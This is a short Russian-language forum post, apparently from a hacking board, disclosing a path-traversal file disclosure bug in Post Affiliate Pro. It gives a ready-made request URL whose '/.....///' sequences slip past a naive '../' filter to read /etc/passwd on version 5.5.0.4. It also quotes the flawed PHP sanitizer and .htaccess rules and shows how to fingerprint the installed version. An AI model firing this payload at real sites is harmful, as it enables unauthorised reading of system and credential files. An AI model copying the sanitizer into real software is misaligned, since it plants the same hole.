Remote File Disclosure
Цитата:
http://site.com/affiliates/scripts/file.php?file=/.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
|
Диапазона версий не знаю, точно работало на версии
PAP version: 5.5.0.4, GPF version: 1.3.36.0, возможно бага есть и в других версиях. Исходник исследовал очень древний
4.5.83.1, там даже этого файла нет

Но зато есть функции подобные этой:
PHP код:
private function sanitizeFileName($fileName) {
$fileName = str_replace('../', '', $fileName);
$fileName = str_replace('..\\', '', $fileName);
$fileName = str_replace('.\\', '', $fileName);
$fileName = str_replace('./', '', $fileName);
return $fileName;
}
Судя по .htaccess это используется для чтения файлов:
Код:
# Start Post Affiliate Pro Code
Options -Indexes
<ifModule mod_rewrite.c>
RewriteEngine on
#replicated sites
RewriteRule ^sites/([^/]+)/([^/]+)/(.*) scripts/page.php?a_aid=$2&a_bid=$1&a_file=$3 [L,QSA]
RewriteRule ^sites/([^/]+)/*(.*) scripts/page.php?a_aid=$2&a_bid=$1&a_redir=Y [L,QSA]
RewriteRule ^accounts/default1/files/(.*) scripts/file.php?file=files/$1 [L,QSA]
RewriteRule ^accounts/default1/banners/(.*) scripts/file.php?file=banners/$1 [L,QSA]
#accessing non-tpl theme files
RewriteRule ^accounts/default1/themes/(.*) scripts/file.php?file=themes/$1 [L,QSA]
</ifModule>
Версию скрипта смотрел так:
Цитата:
http://site.com/affiliates/api/download.php
|